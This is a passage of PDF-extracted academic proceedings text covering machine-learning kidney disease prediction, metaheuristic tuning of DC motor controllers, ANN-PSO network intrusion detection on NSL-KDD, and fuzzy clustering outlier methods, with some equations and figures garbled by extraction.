used algorithm that supervises and predicts the required outcome. The main objective
of this supervised learning algorithm is to produce a decision boundary which is called
hyperplane [24], and it divides space of n-dimensional into classes just so every time
a new input is given it is assigned to the right category. Table 4 lists the benefits and
downsides of this machine learning technique.
6.5 KNN
One of the elementary machine learning algorithm with no parameters. In this type
of approach, the harmony between the new cases are checked and they are assigned
to a class as per the similarity. Though mostly it is employed for classification, KNN
can also be used to predict the outcome of regression problems. In KNN, the training
data is not absorbed straightaway and hence the term of lazy learner is given to this
technique. The drawbacks and benefits of this classification technique are stated in
Table 5.
In this type of machine learning approach, various classifiers are blended so that
a complicated problem can be solved and the model performance increases signif-
icantly. In random forest, the prediction of one decision tree is not considered, as
shown in Fig. 5, rather the performance of more than one decision tree is taken into
consideration and thereafter the final result is produced by averaging or with respect
to the majority prediction. Table 6 lists the pros and cons of random forest.
7 Examination of Performance
Confusion matrix is a catalogue that is very frequently used for the measurement of
potentiality of various machine learning classification methods. Error matrix is an
another name that is given to this table.
The different terminologies for the confusion matrix which has been shown in
Table 7 is explained below:
True Positive (TP): It is true and the prediction obtained is positive.
True Negative (TN): It is true and the prediction obtained is negative.
False Positive (FP): It is false and the prediction obtained is positive.
False Negative (FN): It is false and the prediction obtained is negative.
The confusion matrix of all the classification techniques that has been employed
to predict the result is displayed in Fig. 6.
The accuracy of the six classification methods and their comparison graph is
plotted in Fig. 7.
120
100
96.42 98.81
80 92.86 92.86 92.86
Accuracy
60 75
40
20
0
Classifier
LR Decision Tree Naïve Bayes SVM KNN Random Forest
Table 9 lists the comparative analysis and performance measure of other papers
that are based on the experiment of predicting chronic kidney disease using various
data mining classification techniques.
References
1. Gourisaria, M. K., Das, S., Sharma, R., Rautaray, S. S., & Pandey, M. (2020). A deep learning
model for Malaria disease detection and analysis using deep convolutional neural networks.
International Journal of emerging Technologies, 11(2), 699–704.
2. Stages of CKD. https://www.healthline.com/health/ckd-stages. Last accessed 26 Jan 2021.
3. Chronic Kidney Disease (CKD). Prevalence and Management in India. https://www.med
india.net/health_statistics/diseases/chronic-kidney-disease-ckd-india.asp. Last accessed 26 Jan
2021.
4. Global Facts: About Kidney Disease. https://www.kidney.org/kidneydisease/global-facts-
about-kidney-disease. Last accessed 26 Jan 2021
5. Aljaaf, A. J., Al-Jumeily, D., Haglan, H. M., Alloghani, M., Baker, T., Hussain, A. J., & Musta-
fina, J. (2018). Early prediction of chronic kidney disease using machine learning supported
by predictive analytics. In IEEE congress on evolutionary computation (CEC) (pp. 1–9). IEEE
6. Almansour, N. A., Syed, H. F., Khayat, N. R., Altheeb, R. K., Juri, R. E., Alhiyafi, J., & Olatunji,
S. O. (2019). Neural network and support vector machine for the prediction of chronic kidney
disease: A comparative study. Computers in Biology and Medicine, 109, 101–111.
7. Xiao, J., Ding, R., Xu, X., Guan, H., Feng, X., Sun, T., & Ye, Z. (2019). Comparison and
development of machine learning tools in the prediction of chronic kidney disease progression.
Journal of Translational Medicine, 17(1), 1–13.
8. Charleonnan, A., Fufaung, T., Niyomwong, T., Chokchueypattanakit, W., Suwanna-wach, S., &
Ninchawee, N. (2016). Predictive analytics for chronic kidney disease using machine learning
techniques. In Management and Innovation Technology International Conference (MITicon)
(pp. 80–83), Bang-San
9. Saha, A., Saha, A., & Mittra, T. (2019). Performance measurements of machine learning
approaches for prediction and diagnosis of chronic kidney disease (CKD). In Proceedings
of the 2019 7th international conference on computer and communications management
(pp. 200–204).
10. Sinha, P., & Sinha, P. (2015). Comparative study of chronic kidney disease prediction using
KNN and SVM. International Journal of Engineering Research and Technology, 4(12), 608–
612.
11. Qin, J., Chen, L., Liu, Y., Liu, C., Feng, C., & Chen, B. (2019). A machine learning methodology
for diagnosing chronic kidney disease. IEEE Access, 8, 20991–21002.
12. Almasoud, M., & Ward, T. E. (2019). Detection of chronic kidney disease using machine
learning algorithms with least number of predictors. International Journal of Soft Computing
and Its Applications, 10(8).
13. Rubini, L. J., & Eswaran, P. (2015). Generating comparative analysis of early stage prediction
of Chronic Kidney Disease. International Journal of Modern Engineering Research (IJMER),
5(7), 49–55.
14. Devika, R., Avilala, S. V., & Subramaniyaswamy, V. Comparative study of classifier for chronic
kidney disease prediction using naive Bayes, KNN and random forest. In 2019 3rd International
conference on computing methodologies and communication (ICCMC) (pp. 679–684). IEEE.
15. Das, S., Sharma, R., Gourisaria, M. K., Rautaray, S. S., & Pandey, M. (2020). Heart disease
detection using core machine learning and deep learning techniques: A comparative study.
International Journal on Emerging Technologies., 11(3), 531–538.
16. Categorical Variable. https://en.wikipedia.org/wiki/Categorical_variable. Last accessed 25 Jan
2021.
17. Anand, A., Anand, H., Rautaray, S. S., Pandey, M., & Gourisaria, M. K. (2020). Analysis and
prediction of chronic heart diseases using machine learning classification models. International
Journal of Advanced Trends in Computer Science and Engineering, 9(5), 8479–8487, 227.
18. Machine Learning Standardization. https://towardsai.net/p/machine-learning/machine-lea
rning-standardization-z-score-normalization-with-mathematics. Last accessed 27 Jan 2021.
748 R. Pramanik et al.
19. Mishra, S., Pandey, M., Rautaray, S. S., & Gourisaria, M. K. (2020). A survey on big data analyt-
ical tools and techniques in health care sector. International Journal on Emerging Technologies.,
11(3), 554–560.
20. Feature Selection For Machine Learning in Python. https://towardsdatascience.com/feature-
selection-for-machine-learning-in-python-filter-methods-6071c5d267d5. Last accessed 26 Jan
2021.
21. Decision Trees in Machine Learning. https://towardsdatascience.com/decision-trees-in-mac
hine-learning-641b9c4e8052. Last accessed 20 Jan 2021.
22. Sharma, R., Gourisaria, M. K., Rautray, S. S., Pandey, M., & Patra, S. S. (2020). ECG classi-
fication using deep convolutional neural networks and data analysis. International Journal of
Advanced Trends in Computer Science and Engineering, 9(4), 5788–5795.
23. Logistic Regression for Machine Learning. https://machinelearningmastery.com/logistic-reg
ression-for-machine-learning/. Last accessed 20 Jan 2021.
24. SVM- Introduction to Machine Learning. https://towardsdatascience.com/support-vector-mac
hine-introduction-to-machine-learning-algorithms-934a444fca47. Last accessed 21 Jan 2021.
25. Evaluating Categorical Models. https://towardsdatascience.com/evaluating-categorical-mod
els-ii-sensitivity-and-specificity-e181e573cff8. Last accessed 24 Jan 2021.
26. Positive and Negative Predictive Values. https://en.wikipedia.org/wiki/Positive_and_negative_
predictive_values. Last accessed 24 Jan 2021.
27. Machine Learning-Performance Metrics. https://www.tutorialspoint.com/machine_lear
ning_with_python/machine_learning_algorithms_performance_metrics.htm. Last accessed
24 Jan 2021.
Comparative Analysis for Optimal
Tuning of DC Motor Position Control
System
1 Introduction
The DC motor, which refers to the direct current motor, is a common component in
many electronic devices. It works according to Lorentz law; the DC motor assembly
has a permanent magnet in which the conductive coil called armature is placed. At
the center, there is a shaft which facilitates rotation. The armature is connected to
commutator rings, which helps to keep contact with the supply at all times, and the
brushes connect the supply to the commutator rings. Another type of motor called the
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 749
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_60
750 A. Singhal et al.
used, and Sect. 5 shows the objective function that is being optimized, followed by
simulation and results in Sect. 6. The conclusion is presented in Sect. 7.
(s) 1.2
= (1)
v(s) 0.00077 s3 + 0.0539 s2 + 1.441 s
3 Controller
3.1 PID
The three parameters of a PID controller are K p , K i and K d . The constant K p produces
an output to correct the error which is proportional to it. The constant K i helps to
diminish the error by integrating it over time until it reaches 0 value. The derivative
constant K d tries to reduce error as it predicts future behavior of error as it uses rate
of change of error. The general equation for PID controller is as Eq. (2)
t
de(t)
G PID = K p e(t) + K i e(t)dt + K d (2)
d(t)
0
752 A. Singhal et al.
3.2 PID-N
The derivative block used in PID controller introduces noise. To avoid this
phenomenon, it is possible to use a filtered derivative loop which has filter coef-
ficient N i . The feedback loop has 1/s in feedback path and N i in the forward path.
The diagram of PID-N is shown in Fig. 1.
PID-N controller produces output according to Eq. (3)
Ki Ni
G PID−N = K p + + Kd (3)
s 1 + Nsi
3.3 F-PID
Ki
G = Kp + + K d s μ (μ, λ > 0) (4)
sλ
Comparative Analysis for Optimal Tuning of DC Motor … 753
4 Algorithms
Global neighborhood algorithm was proposed by Alazzam in 2013 [15]. In this, the
initial population is randomly generated, and its fitness is calculated. Then, ordering
of population according to fitness is done, and best solution is assigned the global
best solution. Then, new population is created, in which first 50% population is
created about the neighborhood of global best solution, and the rest 50% is randomly
generated. Again, calculation of fitness and ordering according to fitness is done. If
the current best solution is better than global best solution, then current best solution
becomes the global best solution, and this procedure continues until the iteration
ends.
It was developed by XS Yang [16]. Bats use echolocation to find their prey while
flying at the velocity vi and position pi . They use waves of frequency f and at a rate
ci and loudness L i . Initially, in the algorithm, population is generated with random
velocity and position. Then, their fitness value is evaluated. Next, the velocity and
position of population are updated according to Eqs. (5)–(7), where β takes a random
number between 0 and 1, and the best solution is denoted by p∗ . Next, a random
number is generated, and if it is greater than ci , a solution among the best solution
is selected, and a new solution is created according to Eq. (8), where the average
loudness of the bats is represented by L t , else generate a random solution. Again,
evaluate the fitness function, and a random number is generated. If new solution has
a better fitness than the fitness of the best solution with the generated random number
being less than the loudness for that bat, in that case, this solution is incorporated, and
pulse rate and loudness are updated according to Eq. (9), and this solution becomes
the best solution. Then repeat the process till the iteration count expires.
f i = f low + f high − f low β (5)
vit = vit−1 + pit − p∗ f i (6)
L it+1 = αL it , cit+1 = ci0 1 − exp(−γ t) (9)
754 A. Singhal et al.
In this paper, the controller parameters have been determined and tuned using GNA
and BA. The objective function used in this work to get the optimal values of
these parameters is the integral time absolute error (ITAE), this is the function to
be minimized. The expression for ITAE is shown in Eq. (10)
tss
ITAE = ∫ t|e(t)|dt (10)
0
For BA and GNA, the population and iteration conditions were as follows:
Maximum population: 40, Maximum iteration: 20
BA parameters:
Maximum frequency: 1, Minimum frequency: 0, α: 0.5, γ : 0.5
The value of the controller parameters is as shown in Table 1.
The value of the transient response parameters for all the controllers tuned using
GNA and BA is shown in Table 2.
The transient response using GNA for controllers has been plotted in Fig. 2.
Table 2 Transient
Algorithm Rise time (s) Settling time (s) Overshoot (%)
parameters of DC motor
position control GNA PID 0.0889 0.1961 2.1233
GNA F-PID 0.0821 0.1283 1.5558
GNA PID-N 0.0782 0.1262 0.1045
BAT PID 0.0829 0.2265 4.9593
BAT F-PID 0.0729 0.1815 4.2854
BAT PID-N 0.0802 0.1284 0.5336
Comparative Analysis for Optimal Tuning of DC Motor … 755
1
Angular Displacement (radians)
0.5
Step Input
Step Response of PID
Step Response of F-PID
Step Response of PID-N
0
1
Angular Displacement (radians)
0.5
Step Input
Step Response of PID
Step Response of F-PID
Step Response of PID-N
0
The transient response using BA for controllers has been plotted in Fig. 3.
7 Conclusion
In this paper, a comparative study of the transient response for PID, F-PID and PID-N
controllers was performed. The controller parameters were obtained and tuned using
GNA and BA. The response was plotted, and parameters like rise time, overshoot
(%) and settling time were obtained, and a comparison was done. It was found that F-
PID gave better performance over PID. Even though BA tuned F-PID gave slightly
756 A. Singhal et al.
better rise time compared to PID-N results for both BA and GNA, the overshoot
and settling time were very high. Hence, the PID-N controller gives the best overall
performance among the three. It was found that tuning of controllers using GNA
gave better overall performance compared to BA.
References
1. Neenu Thomas, D. P. P. (2009). Position control of DC motor using genetic algorithm based
PID controller. Proc World Congr Eng 2009
2. Aamir, M. (2013). On replacing PID controller with ANN controller for DC motor position
control. Int J Res Stud Comput, 2, 21–29. https://doi.org/10.5861/ijrsc.2013.236
3. Moran, M. E. F., & Viera, N. A. P. (2018). Comparative study for DC motor position controllers.
In 2017 IEEE 2nd Ecuador Tech Chapters Meet ETCM 2017 2017-Janua:1–6. https://doi.org/
10.1109/ETCM.2017.8247475
4. Flores-Morán, E., Yánez-Pazmiño, W., & Barzola-Monteses, J. (2018). Genetic algorithm and
fuzzy self-tuning PID for DC motor position controllers. Proc 2018 19th Int Carpathian Control
Conf ICCC 2018, 162–168. https://doi.org/10.1109/CarpathianCC.2018.8399621
5. Duman, S., Maden, D., & Güvenç, U. (2011). Determination of the PID controller parameters
for speed and position control of DC motor using gravitational search algorithm. In ELECO
2011—7th Int Conf Electr Electron Eng.
6. Dhieb, Y., Yaich, M., Guermazi, A., & Ghariani, M. (2019). PID controller tuning using ant
colony optimization for induction motor. J Electr Syst, 15, 133–141.
7. Manoj Kushwah PAP (2014) Tuning of PID controller for speed control of DC motor using
soft computing techniques—A review. Adv Electron Electr Eng, 4.
8. Allaoua, B., & Mebarki, B. (2012). Intelligent PID DC motor speed control alteration param-
eters using particle swarm optimization. Artif Intell Resour Control Autom Eng, 3–14. https://
doi.org/10.2174/978160805126711201010003
9. Meshram Rohit, P. M., & Kanojiya G. (2012). Method for speed control of DC Motor. Int Conf
Adv Eng Sci Manag, 117–122.
10. Das, K. R., Das, D., & Das, J. (2016). Optimal tuning of PID controller using GWO algorithm
for speed control in DC motor. Int Conf Soft Comput Tech Implementations, ICSCTI, 2015,
108–112. https://doi.org/10.1109/ICSCTI.2015.7489575
11. Jain, R. V. , & MVA, ASJ. (2016). Tuning of fractional order PID controller using particle
swarm optimization technique for DC motor speed control, 006, 6–9
12. Hekimoglu, B. (2019). Optimal Tuning of Fractional Order PID Controller for DC Motor Speed
Control via Chaotic Atom Search Optimization Algorithm. IEEE Access, 7, 38100–38114.
https://doi.org/10.1109/ACCESS.2019.2905961
13. Premkumar, K., & Manikandan, B. V. (2016). Bat algorithm optimized fuzzy PD based speed
controller for brushless direct current motor. Eng Sci Technol an Int J, 19, 818–840. https://
doi.org/10.1016/j.jestch.2015.11.004
14. Gozde, H., Taplamacioglu, M. C., & Ari, M. (2017). Simulation study for global neighborhood
algorithm based optimal automatic voltage regulator (AVR) system. In ICSG 2017—5th Int
Istanbul Smart Grids Cities Congr Fair (pp. 46–50). https://doi.org/10.1109/SGCF.2017.794
7634
15. Alazzam A. W. H. (2013). A new optimization algorithm for combinatorial problems. Int J
Adv Res Artif Intell, 2, 63–68. https://doi.org/10.14569/ijarai.2013.020510
16. Yang, X. S. (2010). A new metaheuristic Bat-inspired Algorithm. Stud Comput Intell, 284,
65–74. https://doi.org/10.1007/978-3-642-12538-6_6
A Hybrid Approach of ANN-PSO
Technique for Anomaly Detection
Abstract As of late, AI-based anomaly detection has found a new interest, as the
number and complexity of new breaches keep on improvising, subsequently, newer
approaches to evolve and best deal with the attacks are fundamental. We propose the
artificial neural networks to devise a novel cyber intrusion detection method. While
the ANNs are popularly trained by the back propagation and genetic algorithm, we
propose the particle swarm optimisation method to help resolve issues like slow
convergence rate and easily getting trapped in local minima which arise with back
Propagation and genetic algorithm. The proposed approach utilises the standard NSL-
KDD data-set used in the field of anomaly detection method. The test results show
that our strategy performs better than a portion of the current procedures including
ANN-BP, ANN- GA, etc. and give accuracy in the range of 97–99%.
1 Introduction
The recent years have seen a growing use of the internet, and with this, an increasing
number of intrusion attacks. In 2020, with the onset of the COVID-19 pandemic and
the sudden and urgent need to digitise and move to online methods of communi-
cation, the development of a model to battle these attacks is necessary. To combat
the attacks, multiple intrusion detection systems (IDSs) have been developed [1–3]
which monitor networks and record any malicious activities that are observed with
a security information system and an event managing system. Intrusion detection
systems are mainly categorised as [4].
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 757
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_61
758 S. Dahiya et al.
• network intrusion detection systems (NIDSs) are responsible for detecting those
malicious activities present in the network delivering incoming traffic.
• host-based intrusion detection systems (HIDSs) [5] are concerned with monitoring
the activities related to the files present on the operating system.
An IDS monitors the given traffic at a time and compares it to the attack informa-
tion already available, making it vital for high-security systems. On the detection of
certain anomalies, the IDS transmits an alert signal to the administrator. These are
some examples of anomalies:
2 Related Work
The KDD Cup 99 Dataset which is based on the DARPA’98 which hasn’t been
widely appreciated as shown by McHugh [15]. The simulated attack types fall under
the categories: Denial of Service Attacks (DoS), User to Root Attacks (U2R), Remote
to Local Attacks (R2L), and Probing Attacks (Probe).
A three-layer MLP was set up for this research process. One of the metrics used,
accuracy, ranged from 87.2% for normal dataset and the highest accuracy achieved
was 99.84% for U2R. Although the result achieved for U2R is high, the range of the
accuracies for the other datasets vary greatly, going from 92.31% for R2L, 94.2%
for Probe and 96.69% for DoS and needs an approach to standardise them into the
same range for better reliability.
In the studies performed by Taher, Yasin Jisan, Rahman, 2019 [16], various
machine learning algorithms were compared against each other with a focus on com-
paring the two specific supervised methods—Artificial Neural Network and Support
Vector Machine.
In this study, artificial neural network was trained with Backpropagation, which
improves the output by taking into account error on each pass. SVM, specifies a
hyperplane that defines the characteristics of classifiers and can be used for classifi-
cation, and is also helpful in the detection of outliers.
The two algorithms were compared using criteria of accuracy. The dataset used
to work on the intrusion detection problem was the NSL-KDD [17] dataset. It is
observed that ANN detects anomalies at a higher percentage of accuracy than SVM
and also has a higher stance in comparison with pre-existing models.
In another study conducted by Latah, Majd, Tokerd, 2018 [18], various super-
vised learning techniques, namely, Naive Bayes (NB), decision trees (DT), random
forest (RT), extreme learning machine (ELM), support vector machines (SVMs),
K nearest-neighbor (KNN), neural networks (NNs), linear discriminant analysis
(LDA), AdaBoost, RUSBoost, BaggingTrees, and LogitBoost were implemented
and compared against each other. The principal component analysis (PCA) method
was utilised for feature selection.
Through the study, it was observed that decision tree-based approach showed
optimum performance in terms of the accuracy, whereas the bagging and boost-
ing performed better than K-nearest neighbors (KNNs), extreme learning machine
(ELM), artificial neural networks (ANNs), support vector machines (SVM), linear
discriminant analysis (LDA), and random forest (RT).
Through these results, it can be gathered that many improvements have been
made available and many more can be made in using supervised measures to detect
anomalies with a good enough accuracy.
3 Proposed Method
of the algorithm, the location and position of each particle are updated as per its
previous knowledge, its experience, and the experience of its neighbours.
A particle is composed of 3 vectors: current location and/or position of the particle
(x-vector), the position of the best solution (p-best), a gradient for which particle will
travel if not updated (v-vector). All the particles are moved towards the best location
found by an individual so far (personal best) and the global best position (global
best) obtained so far by all particles which is done by adding the velocity-vector to
the position-vector to get another position-vector.
new Xi = Xi + V i (1)
When the particle calculated the new Xi, then it calculated its new position. If
new-fitness is better than p_best-fitness, then-
Using the PSO Algorithm to Train ANN This study uses PSO as a method to
train [19] and also work on optimising the network’s weights and biases. This is
done by creating a swarm with dimension equals the number of weights and biases
which is achieved by using an n-dimensional array and retrieval of the weights and
biases is done while feeding back to the network. Each of these particles represents an
individual neural network. To compute the error between the predictions and ground-
truth values, the Negative Log-likelihood is used. Figure 1 describes the ANN-PSO
algorithm.
The entire codebase of the algorithm was written in the Python; Google Colab was
used with the hardware specification as GPU: 1xTesla K80, compute 3.7, having
2496 CUDA cores, CPU: 1xsingle core hyper threaded Xeon Processors @2.3Ghz
i.e.(1 core, 2 threads), and RAM: 12.6 GB Available.
4.1 Dataset
There are many datasets available for intrusion detection systems, some examples
being - DARPA98, KDDCup99, CAIDA, NSL-KDD, ISCX 2012, ADFA-LD and
ADFA-WD and CICIDS 2017 [20]. Among these datasets, NSL-KDD dataset [17]
has been relied upon by many research works to be consistent and duly representing
real-time network traffic [14]. Hence, this is the dataset used in this research work.
It is derived from KDDCup [11] to eliminate the issues in the original KDDCup
dataset which lead to faulty performance of anomaly detection methods. The main
A Hybrid Approach of ANN-PSO Technique … 761
criticism revolves around the non-familiarity of the traffic to real data networks,
no exact definition of attacks, and so on [13]. In these, the labelled attacks can be
classified into four subdivisions:
• denial of service attacks (DoS) take over a particular system and shuts down traffic
to and from the system, causing a large influx in the traffic, more than system
capacity, leading to the system shutting down.
• Probe attacks, also known as surveillance attacks, steal sensitive information.
• Users to Root attacks (U2R) attempt to exploit weaknesses in a system to gain
access to the network as a super-user for root access to that network.
• Remote to Local attacks (R2L) access a remote machine without access to the
local network which compromises network from a remote machine.
The labels of all the attacks mentioned in the KDD data-sets were successfully
categorised according to the four intrusion attack classes. Table 1 contains attacks
and percentages of each attack recorded.
762 S. Dahiya et al.
Table 1 Kinds of attacks and their subset category along with percentage in the datasets
Attacks Label KDDTrain+ KDDTest+
DoS Neptune, teardrop, 47420 (37.64%) 7533 (33.41%)
nmap, smurf, pod,
back, land, udpstorm,
worm, apache2,
mailbomb,
processtable
Probe Ipsweep, portsweep, 10163 (8.07%) 2348 (10.41%)
saint, satan, mscan
U2R xterm, perl, rootkit, 52 (0.04%) 67 (0.31%)
buffer_overflow,
loadmodule, sqlattack,
ps
R2L xlock, warezclient, 995 (0.79%) 2885 (12.90%)
guess_passwd,
snmpguess, ftp_write,
phf, warezmaster,
multihop, imap, spy,
sendmail, httptunnel,
named, snoop,
snmpgetattack
Accuracy is used as the performance measure for our model where Accuracy is given
by the number of correct predictions by all of the predictions made.
TP +TN
Accuracy = (3)
T P + FP + FN + T N
The numerator specifies the right predictions (True positives and True Negatives),
whereas, the denominator describes all the predictions by the algorithm. To measure
the performance, the confusion matrix is used.
4.3 Analysis
The results obtained for each of these subsets are discussed below with comparison
with the various optimisation parameters, focusing on number of particles versus
accuracy and best cost, number of iterations versus accuracy and best cost, number
of hidden neurons versus accuracy and best cost.
In the graph shown in Fig. 2 the increase in particles to 500, causes the accuracy
to improve 95–98%, with similar performance towards the end of the curve. With
respect to the change in best cost with an increase in Particles in Fig. 3, the best cost
reduces as we increase the particles, and reaches a constant value.
The graph in Fig. 4 shows the accuracy of all the attack types consistently increases
from 95% and reaches its peak at to 98%, as we increase the iterations to 200. All the
subsets show similar behaviour as we increase the iterations and eventually become
constant. In Fig. 5 the best cost reduces as we increase the iterations. Exhibiting
similar behaviour, it reaches a point of constant value after certain iterations, and the
performance of the model does not change after.
The graph in Fig. 6 shows that the accuracy increases until 50 hidden neurons,
and thereafter, reaches a constant value. Similarly, for the graph in Fig. 7, the cost
reduces to 50 hidden neurons and then it gets saturated.
5 Conclusion
Through this paper, we presented the supervised learning model of artificial neural
networks coupled with particle swarm optimisation, which is used for training the
algorithm, to detect unknown anomaly attacks. The algorithm was tested using the
standard public data-set NSL-KDD. The experimental results and comparison with
similar studies conducted in the field of intrusion detection with supervised learning,
our model is more reliable, as the accuracy obtained for the various subdivisions
of the data-set, namely, DoS, Probe, R2L, U2R and Mixed, show accuracy ranging
from 97–99%, with very slight diversion.
766 S. Dahiya et al.
There are optimum parameters that can be set to get best results using the ANN-
PSO algorithm, indicating that the fixed parameters used during the algorithm impacts
the performance metrics. Using 50 particles or more gives the best accuracy; and the
optimal accuracy is obtained at 75 particles. The number of hidden neurons are
typically varying across the subdivisions but using 75–150 hidden neurons shows
maximum accuracy. The marginal increase in accuracy while further changing the
parameters of the algorithm proves that the ANN-PSO model is consistent.
References
1. Shilpashree, S., et al. (2020). Evaluation of Supervised Machine Learning Algorithms for Intru-
sion Detection in Wireless Network Using KDDCUP’99 and NSLKDD Datasets. International
Journal of Advanced Science and Technology, 29(3), 15037-15052–15037-15052
2. Pu, G., Wang, L., Shen, J., & Dong, F. (2021). A hybrid unsupervised clustering-based anomaly
detection method. Tsinghua Science and Technology, 26(2), 146–153.
3. Chandre, P. R., Mahalle, P. N., & Shinde, G. R. (2018). Machine learning based novel approach
for intrusion detection and prevention system: A tool based verification. In IEEE Global Con-
ference on Wireless Computing and Networking (GCWCN) (pp. 135–140). India: Lonavala.
4. Fischer-Hübner, S. (n.d.). Intrusion Detection (IDS). Karlstad University Computer Science.
www.cs.kau.se/cs/education/courses/dvgc04/07p5/slides/Intrusion%20Detection%20(IDS).
pdf
5. Zhang, X., Niyaz, Q., Jahan, F., & Sun, W. (2020). Early detection of host-based intrusions
in linux environment. In IEEE International Conference on Electro Information Technology
(EIT) (pp. 475–479). Chicago: IL, USA.
6. Malek, Z. S., Trivedi, B., & Shah, A. (2020). User behavior pattern -signature based intrusion
detection. 2020 Fourth World Conference on Smart Trends in Systems, Security and Sustain-
ability (WorldS4) (pp. 549–552). London: United Kingdom.
7. Anand Sukumar, J. V., Pranav I., Neetish, M. & Narayanan, J. (2018). Network intrusion detec-
tion using improved genetic k-means algorithm. In: 2018 International Conference on Advances
in Computing, Communications and Informatics (ICACCI) (pp. 2441–2446). Bangalore.
8. Halimaa, A., & Sundarakantham, K. (2019). Machine learning based intrusion detection sys-
tem. In 3rd International Conference on Trends in Electronics and Informatics (ICOEI) (pp.
916–920). India: Tirunelveli.
9. Johari, R., Kalra, S., Dahiya, S., & Gupta, K. (2021). S2NOW: Secure social network ontology
using whatsApp. Security and Communication Networks, 2021, Article ID 7940103, 21 pages.
10. Dahiya, S., & Sharma, R. (2018). Comparative study of popular cryptographic techniques.
In 2018 Second World Conference on Smart Trends in Systems, Security and Sustainability
(WorldS4) (pp. 36–43). London.
11. KDD Cup 1999 Data, kdd.ics.uci.edu/databases/kddcup99/kddcup99.html
12. Kaliappan, J. (2015). Intrusion detection using artificial neural networks with best set of fea-
tures. International Arab Journal of Information Technology.
13. Tavallaee, M., Bagheri, E., Lu, W., & Ghorbani, A. A. (2009). A detailed analysis of the KDD
CUP 99 data set. IEEE Symposium on Computational Intelligence for Security and Defense
Applications (pp. 1–6). Ottawa, ON.
14. Hamid, Y., Ranganathan, B., Journaux, L., & Sugumaran, M. (2018). Benchmark datasets for
network intrusion detection: A review. International Journal of Network Security.
15. McHugh, J. (2000). Testing intrusion detection systems: a critique of the 1998 and 1999 darpa
intrusion detection system evaluations as performed by lincoln laboratory. ACM Transactions
on Information and System Security, 3(4), 262–294.
A Hybrid Approach of ANN-PSO Technique … 767
16. Taher, K. A., Jisan, B. M., & Rahman, M. M. (2019). Network intrusion detection using
supervised machine learning technique with feature selection. In 2019 International Conference
on Robotics,Electrical and Signal Processing Techniques (ICREST), pp. 643–646.
17. NSL-KDD-Datasets-Research-Canadian Institute for Cybersecurity-UNB. (n.d.). University
of New Brunswick www.unb.ca/cic/datasets/nsl.html
18. Latah, M., & Toker, L. (2018). Towards an efficient anomaly-based intrusion detection for
software-defined networks. IET Networks, 2(7), no. 6, pp. 453–59. arXiv.org.
19. Nagappan, K., Kanmani, S., & Uthariaraj, V. (2013). Improving fault prediction using ANN-
PSO in object oriented systems. International Journal of Computer Applications.
20. Khraisat, A., Gondal, I., Vamplew, P., et al. (2019). Survey of intrusion detection systems:
techniques, datasets and challenges. Cybersecur, 2, 20.
Comparison of Density-Based
and Distance-Based Outlier Identification
Methods in Fuzzy Clustering
1 Introduction
A. Gosain
USICT, GGSIP University, Delhi, India
S. Dahiya (B)
Delhi Technological University, Delhi, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 769
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_62
770 A. Gosain and S. Dahiya
Outlier Identification
Methods
A density-based outlier detection method considers the density of a data object and
its neighbors. A data object is spotted as an outlier if its density is comparatively far
poorer than that of its neighbors [10].
Based on this concept of density-based outlier, a variation density-based outlier
method, DO, is proposed by P. Kaur and A. Gosain in 2010 [11, 12]. In DO, outlier
identification is done by presenting a new term, neighborhood membership, which
is defined as follows:
ηneighborhood
i
i
Mneighborhood (X ) = (1)
ηmax
where ηneighborhood
i
= sum of data objects in neighborhood of data object—‘xi ’ and
ηmax =i=1...n (ηneighborhood
max i
). Any data object, ‘x j ’, is said to be in neighborhood of
‘xi ’ only if it fulfills the following condition:
where dist(p, i) is Euclidean distance between ‘i’ and ‘p’; and r neighborhood is neigh-
borhood radius. Outliers are pin pointed using the following equation after tuning a
i
threshold value ‘α’ for Mneighborhood :
< α, outlier
i
Mneighborhood = , ∀i. i[1, . . . , n] (3)
≥ α, non-outlier
3 DO Versus DB
In this section, we have compared DO and DB. In Sect. 3.1, step-by-step working is
discussed on two standard datasets. In Sect. 3.2, performance analysis on number of
standard datasets is discussed.
For this work, four standard dataset forms are used: D12, D15, D115, and Bensaid.
Brief description for each dataset is give in Table 1.
15 15 15
10 10 10
5 5 5
0 0 0
-5 -5 -5
15 15
10 10
5 5
0 0
-5 -5
-10 -10
-10 -5 0 5 10 -10 -5 0 5 10
(d) (e)
Fig. 2 Working of DO on D12 for various threshold values a 0.05, b 0.10, c 0.15, d 0.20, e 0.25
Figs. 2, 3, and Table 2, it can be observed that DB is able to identify the noise and
outlier, but DO does identify only one outlier in a range of 0.0–0.35 threshold value.
Figures 4 and 5 are step wise process of DO and DB outlier identification process
for D115 dataset on various threshold values (0.05, 0.10, 0.15, 0.20, 0.25) respec-
tively. From Figs. 4, 5, and Table 2, it can be observed that DB shows high stability
in outlier identification as for the threshold value range 0.0–0.35, count of outliers is
8–10, but for the same range DO shows count of outliers from 9 to 37.
For further detailed analysis of performance of DO and DB, results are represented
using histograms in Figs. 6, 7, and 8. For all these plots, x-axis shows threshold value
and y-axis shows number of outliers, and red colored bars are for DB results and
green colored bars are for DO results. It is observed from these histograms that
DB shows higher stability and accuracy in identification of outliers, as well as not
hypersensitivity to the choice of threshold value and quick convergence on threshold
value of distance-based method over density-based method.
774 A. Gosain and S. Dahiya
15 15 15
10 10 10
5 5 5
0 0 0
-5 -5 -5
15 15
10 10
5 5
0 0
-5 -5
-10 -10
-10 -5 0 5 10 -10 -5 0 5 10
(d) (e)
Fig. 3 DB on D12 on various threshold values a 0.05, b 0.10, c 0.15, d 0.20, e 0.25
4 Conclusion
20 20
10 10
0 0
-10 -10
-20 -20
-30 -30
-40 -20 0 20 40 60 -40 -20 0 20 40 60
(a) (b)
20 20
10 10
0 0
-10 -10
-20 -20
-30 -30
-40 -20 0 20 40 60 -40 -20 0 20 40 60
(c) (d)
20 20
10 10
0 0
-10 -10
-20 -20
-30 -30
-40 -20 0 20 40 60 -40 -20 0 20 40 60
(e) (f)
